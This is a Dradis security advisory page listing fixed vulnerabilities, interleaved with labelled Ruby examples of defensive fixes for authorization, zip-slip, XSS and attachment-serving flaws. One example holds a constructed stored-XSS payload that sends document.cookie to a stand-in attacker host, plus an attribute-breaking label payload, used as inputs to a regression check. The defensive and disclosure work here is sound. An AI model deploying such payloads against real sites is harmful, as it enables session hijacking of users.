Security Reports

This page lists all security vulnerabilities fixed in released versions of Dradis. Each vulnerability is given a security impact rating by the Dradis core team; note that this rating may vary from platform to platform. We also list the versions of Dradis the flaw is known to affect. Where a flaw has not been verified against a version, that version is listed with a question mark.

Please send comments or corrections for these vulnerabilities to: security[ {at} ]dradisframework{ [dot] }org

Fixed in Dradis 3.7.0

medium: Authenticated persistent cross-site scripting

Insufficient output encoding of Comment textarea input resulted in arbitrary JavaScript code execution.

Affects: CE: 3.16, Pro: 3.6.0 and possibly older versions of Dradis.

Credit: Erik Cabetas

low: Authenticated (admin) persistent cross-site scripting

Insufficient output encoding around the Methodology templates resulted in arbitrary JavaScript code execution.

Affects: Pro 3.6.0 and possibly older versions of Dradis.

Fixed in Dradis 3.6.0

high: Authenticated (author) information disclosure

An author with an active session who is disabled by an admin may continue to operate within the application.

Affects: Pro 3.5.1 and possibly older versions of Dradis.

medium: Authenticated (admin) data modification

An admin can update another user's comment by sending a custom request.

Affects: Pro 3.5.0 and possibly older versions of Dradis.

Credit: Security Compass

Fixed in Dradis 3.5.0

high: Authenticated (author) information disclosure

An author without permission on a project may obtain info from that project using the API.

Affects: Pro 3.4.1 and possibly older versions of Dradis.

Credit: Bastian Faure & Florian Nivette
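The disabled-user, comment-modification and API information-disclosure entries above all come down to checks that must run on the server for every request: re-validate the account on each request rather than trusting a session issued earlier, authorize project access on API routes exactly as on HTML routes, and check ownership on the update request itself. The following is an added example, not Dradis code: a plain-Ruby stand-in for Rails before_action filters. The class and method names (RequestGuard, authenticate!, authorize_project!, authorize_comment_edit!) and the Struct models are assumptions made for the example, and the users, projects and sessions are constructed.

```ruby
# Added example, not Dradis code: per-request authentication and authorization
# checks modelled on Rails before_action filters, in plain Ruby so it runs alone.
User    = Struct.new(:id, :admin, :enabled, :sessions_invalidated_at, keyword_init: true)
Project = Struct.new(:id, :member_ids, keyword_init: true)
Comment = Struct.new(:id, :author_id, :body, keyword_init: true)
Session = Struct.new(:user_id, :issued_at, keyword_init: true)

class Unauthorized < StandardError; end   # would map to 401 / redirect to login
class Forbidden    < StandardError; end   # would map to 403 (or 404, see below)

class RequestGuard
  def initialize(users:, projects:)
    @users, @projects = users, projects
  end

  # Re-read the user record on every request instead of trusting the session
  # cookie or API token: a user disabled after logging in, or whose sessions
  # were revoked, is rejected even though the credential itself is still valid.
  def authenticate!(session)
    user = session && @users[session.user_id]
    raise Unauthorized, "unknown user" unless user
    raise Unauthorized, "account disabled" unless user.enabled
    cutoff = user.sessions_invalidated_at
    raise Unauthorized, "session revoked" if cutoff && session.issued_at <= cutoff
    user
  end

  # Authorization is per project and runs for API routes exactly as for HTML
  # ones; being logged in is not the same as being a member of the project.
  # Non-members get "not found" so that project ids cannot be enumerated.
  def authorize_project!(user, project_id)
    project = @projects[project_id]
    raise Forbidden, "project not found" unless project && project.member_ids.include?(user.id)
    project
  end

  # Ownership, not role: editing a comment is reserved for its author, and the
  # check lives on the update request, not only in the UI that hides the button.
  def authorize_comment_edit!(user, comment)
    raise Forbidden, "not the comment author" unless comment.author_id == user.id
    comment
  end

  # Disabling an account also invalidates every session issued up to that moment.
  def disable_user!(user_id, at:)
    user = @users.fetch(user_id)
    user.enabled = false
    user.sessions_invalidated_at = at
  end

  # Simulated endpoints: both call authenticate! first, then the specific check.
  def api_show_project(session, project_id)           # GET /api/projects/:id
    project = authorize_project!(authenticate!(session), project_id)
    { id: project.id, members: project.member_ids }
  end

  def update_comment(session, comment, body)          # PATCH /comments/:id
    authorize_comment_edit!(authenticate!(session), comment)
    comment.body = body
    comment
  end
end
```

Timestamps are plain integers to keep the example deterministic; in a real application sessions_invalidated_at would be a column on the user record and issued_at would come from the session store or token.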

medium: Authenticated (author) information disclosure

Mentioning a user who does not have access to the project in a comment could result in content from future comments in the same thread being disclosed to that user.

Affects: Pro 3.4.1 and possibly older versions of Dradis.

Fixed in Dradis 3.4.1

high: Authenticated (author) path traversal vulnerability

Uploading a malicious zip file made it possible to write files to locations outside the intended directory on the filesystem.

Affects: CE 3.14, Pro 3.4 and possibly older versions of Dradis.

Credit: Props go to Emil Sågfors.
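The path traversal entry above is the classic archive case: entry names are attacker controlled, so extraction code must decide the destination path itself rather than trusting the name in the archive. The following is an added example, not Dradis code: a plain-Ruby module (SafeUnzip, a name chosen here) that performs a lexical check on each entry name and a physical check against symlinks before writing. The entry list is an in-memory stand-in for iterating a real archive, and the entry names are constructed.

```ruby
require 'fileutils'
require 'tmpdir'

# Added example, not Dradis code: reject archive entries whose names would
# escape the extraction directory ("zip slip"). Entry names are attacker
# controlled, so the extraction code, not the archive library, decides paths.
module SafeUnzip
  # Lexical check only (no filesystem access): the absolute path an entry may
  # be written to, or nil if it must be rejected.
  def self.extract_path(dest, entry_name)
    base = File.expand_path(dest)
    name = entry_name.to_s
    return nil if name.empty? || name.include?("\0") || name.include?("\\")
    # Absolute names are rejected, and so is "~": File.expand_path turns
    # "~user/x" into that user's home directory.
    return nil if name.start_with?("/", "~")
    target = File.expand_path(name, base)   # collapses "." and ".."
    # Strictly inside base. The trailing separator stops base "out" from
    # accepting "../out2/x" as if it were a child.
    return nil unless target.start_with?(base + File::SEPARATOR)
    target
  end

  # Physical check: walk up from +dir+ to its deepest existing ancestor and
  # make sure that ancestor really lives under +real_base+. This catches a
  # symlink planted by an earlier entry that points outside the destination.
  def self.physically_inside?(dir, real_base)
    probe = dir
    probe = File.dirname(probe) until File.exist?(probe)
    real = File.realpath(probe)
    real == real_base || real.start_with?(real_base + File::SEPARATOR)
  end

  # Write [name, content] pairs (a stand-in for iterating a real archive) into
  # +dest+. Returns [written_paths, rejected_names].
  def self.extract(dest, entries)
    FileUtils.mkdir_p(dest)
    real_base = File.realpath(dest)
    written, rejected = [], []
    entries.each do |name, content|
      target = extract_path(dest, name)
      dir = target && File.dirname(target)
      # Also refuse to write through a symlink sitting at the final path component.
      if target.nil? || !physically_inside?(dir, real_base) || File.symlink?(target)
        rejected << name
        next
      end
      FileUtils.mkdir_p(dir)
      File.binwrite(target, content)
      written << target
    end
    [written, rejected]
  end
end
```

The lexical check alone is not enough: an archive can first ship a symlink entry pointing outside the destination and then a file entry whose path passes through it, which is why extract re-resolves the deepest existing ancestor with File.realpath before creating anything.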

medium: Authenticated (author) information disclosure

Information from one project could be disclosed to other users who happened to be using the application concurrently.

Affects: CE 3.14, Pro 3.4 and possibly older versions of Dradis.

low: Authenticated (admin) SQL Injection

A SQL injection vector exploitable by administrator accounts only was identified affecting the Contributors module.

Affects: Pro: 3.2 to 3.4.

Fixed in Dradis 3.2.0

medium: Authenticated persistent cross-site scripting

Insufficient output encoding around Evidence title resulted in arbitrary JavaScript code execution.

Affects: CE: 3.11, Pro: 3.1.2 and possibly older versions of Dradis.

Credit: Props go to an anonymous Dradis user.

medium: Authenticated persistent cross-site scripting

Inline display of some attachments resulted in arbitrary JavaScript code execution.

Affects: CE: 3.11, Pro: 3.1.2 and possibly older versions of Dradis.

Credit: Props go to an anonymous Dradis user.

Fixed in Dradis 3.11.1

medium: Authenticated persistent cross-site scripting

Insufficient output encoding around the Textile textarea input resulted in arbitrary JavaScript code execution.

Affects: CE: 3.11, Pro: 3.1.1 and possibly older versions of Dradis.

Credit: Props go to Ohji Kashiwazaki and Sabina Rzeźwicka.

CVE-2019-5925

Fixed in Dradis 3.10.0

medium: Authenticated persistent cross-site scripting

Insufficient output encoding around the Textile textarea input resulted in arbitrary JavaScript code execution.

Affects: CE: 3.9, Pro: 2.9 and possibly older versions of Dradis.

Credit: Props go to Robert Diepeveen

Fixed in Dradis 3.6.0

medium: Authenticated persistent cross-site scripting

Insufficient output encoding around the revision history module resulted in arbitrary JavaScript code execution.

Affects: CE: 3.x, Pro: 2.x and possibly older versions of Dradis.

Credit: Props go to Marly Wilson

Fixed in Dradis 3.1.0.rc2

medium: Authenticated persistent cross-site scripting

Insufficient output encoding around the node labels resulted in arbitrary JavaScript code execution.

Affects: 3.1.0.rc1 and possibly older versions of Dradis.

Credit: Props go to Mahmoud Reda
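The persistent cross-site scripting entries on this page (Comment textareas, Methodology templates, Evidence title, the Textile textarea, the revision history module and node labels) share one root cause: a user-controlled field reached the page without HTML encoding. The following is an added example, not Dradis code and not the renderer Dradis uses: a toy Textile-like renderer (TinyTextile, a name chosen here) in plain Ruby that contrasts the vulnerable and the fixed order of operations, adds the attribute-context case that node labels and titles fall into, and provides a small regression check. The payloads are constructed.

```ruby
require 'erb'

# Added example, not Dradis code. A toy Textile-like renderer: only the two
# RULES below are allowed to emit HTML; anything the user typed must reach the
# page as text. The vulnerable variant skips the encoding step.
module TinyTextile
  RULES = [
    [/\*([^*\n]+)\*/, '<strong>\1</strong>'], # *bold*
    [/_([^_\n]+)_/,   '<em>\1</em>'],         # _emphasis_
  ].freeze

  def self.apply_rules(text)
    RULES.reduce(text) { |html, (re, sub)| html.gsub(re, sub) }
  end

  # Vulnerable: the stored field is treated as markup source and the result is
  # emitted as HTML, so a literal <script> tag in the field survives unchanged.
  def self.render_unsafe(text)
    apply_rules(text)
  end

  # Fixed: HTML-encode the untrusted text *before* the markup pass. The only
  # tags that can appear in the output are the ones RULES generate.
  def self.render_safe(text)
    apply_rules(ERB::Util.html_escape(text))
  end

  # Attribute context (node labels, titles): the value must be encoded and the
  # attribute must be quoted. Encoding alone does not help in an unquoted one.
  def self.label_attr(label)
    %(<span class="node-label" title="#{ERB::Util.html_escape(label)}">)
  end

  # Regression check usable from a test suite: which tags appear in the
  # rendered HTML that the renderer was never supposed to produce?
  def self.unexpected_tags(html, allowed = %w[strong em])
    html.scan(/<\/?([A-Za-z][A-Za-z0-9]*)/).flatten.map(&:downcase).uniq - allowed
  end
end

# Constructed payloads of the kind the advisories on this page describe:
# a stored comment and a node label.
COMMENT = "*Thanks!* <script>document.location='https://attacker.example/?c='+document.cookie</script>"
LABEL   = 'Web server" onmouseover="alert(document.cookie)'

if __FILE__ == $0
  puts TinyTextile.render_unsafe(COMMENT)   # <script> reaches the browser
  puts TinyTextile.render_safe(COMMENT)     # &lt;script&gt; is displayed as text
  puts TinyTextile.label_attr(LABEL)        # the quote cannot close the attribute
end
```

The order matters: encoding after the markup pass would also escape the tags the renderer legitimately produced, which is the usual reason developers end up marking the whole result as safe HTML and re-introducing the flaw.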

Fixed in Dradis 2.5.2

high: Unauthenticated reflected cross-site scripting

Insufficient output encoding could result in arbitrary JavaScript code being executed if a specially crafted file was uploaded by an authenticated user.

Affects: 2.5.1, 2.5.0 and possibly older versions of Dradis.

Credit: Props go to Russ McRee for identifying this issue.

CVE not assigned yet
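Both this entry and the "inline display of some attachments" entry under 3.2.0 describe the same failure mode: a file an authenticated user uploaded is later served in a way that lets the browser interpret it as HTML or script. The defence is on the download side: decide the content type from the file's own bytes, serve inline only an allowlist of types that cannot carry script, send everything else as an attachment with a neutral type, and disable MIME sniffing. The following is an added example, not Dradis code: a plain-Ruby module (AttachmentResponse, a name chosen here) that builds those headers. The magic-byte table, the sandbox CSP for the inline case and the sample files are assumptions made for the example.

```ruby
require 'erb'

# Added example, not Dradis code: build response headers for a user-uploaded
# attachment so the browser never treats it as HTML or script, whatever name
# or Content-Type the uploader supplied.
module AttachmentResponse
  # Only these types may be shown inline, and only when the file's own bytes
  # say so. SVG and HTML are deliberately absent: both can carry script.
  MAGIC = {
    "image/png"  => "\x89PNG\r\n\x1a\n".b,
    "image/jpeg" => "\xFF\xD8\xFF".b,
    "image/gif"  => "GIF8".b,
  }.freeze

  # Content type from the leading bytes; nil unless it is an allowlisted image.
  def self.sniff(bytes)
    head = bytes.b[0, 16]
    MAGIC.each { |type, sig| return type if head.start_with?(sig) }
    nil
  end

  # Content-Disposition with a header-safe ASCII fallback (no quotes, no CR/LF,
  # so no header injection) plus an RFC 5987 filename* carrying the original.
  def self.disposition(kind, filename)
    ascii = filename.gsub(/[^A-Za-z0-9_.\-]/, "_")
    ascii = "download" if ascii.empty?
    "#{kind}; filename=\"#{ascii}\"; filename*=UTF-8''#{ERB::Util.url_encode(filename)}"
  end

  def self.headers_for(filename, bytes)
    headers = { "X-Content-Type-Options" => "nosniff" }  # never let the browser guess
    if (type = sniff(bytes))
      headers["Content-Type"]            = type
      headers["Content-Disposition"]     = disposition("inline", filename)
      # Defence in depth for the inline case: if a browser ever did execute
      # something from this response, the sandbox and empty source list
      # would block script and network access.
      headers["Content-Security-Policy"] = "default-src 'none'; sandbox"
    else
      headers["Content-Type"]        = "application/octet-stream"
      headers["Content-Disposition"] = disposition("attachment", filename)
    end
    headers
  end
end
```

Serving attachments from a separate origin (a dedicated download hostname) is the stronger complement to these headers, because even a file that does get rendered then cannot read the application's cookies or DOM.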

Fixed in Dradis 2.0.1

high: Missing authentication

The authentication filter was found to be missing in two components of the server module (notes and configuration).

This was fixed in revision 598.

Affects: 2.0.0

CVE-2009-0670 (candidate)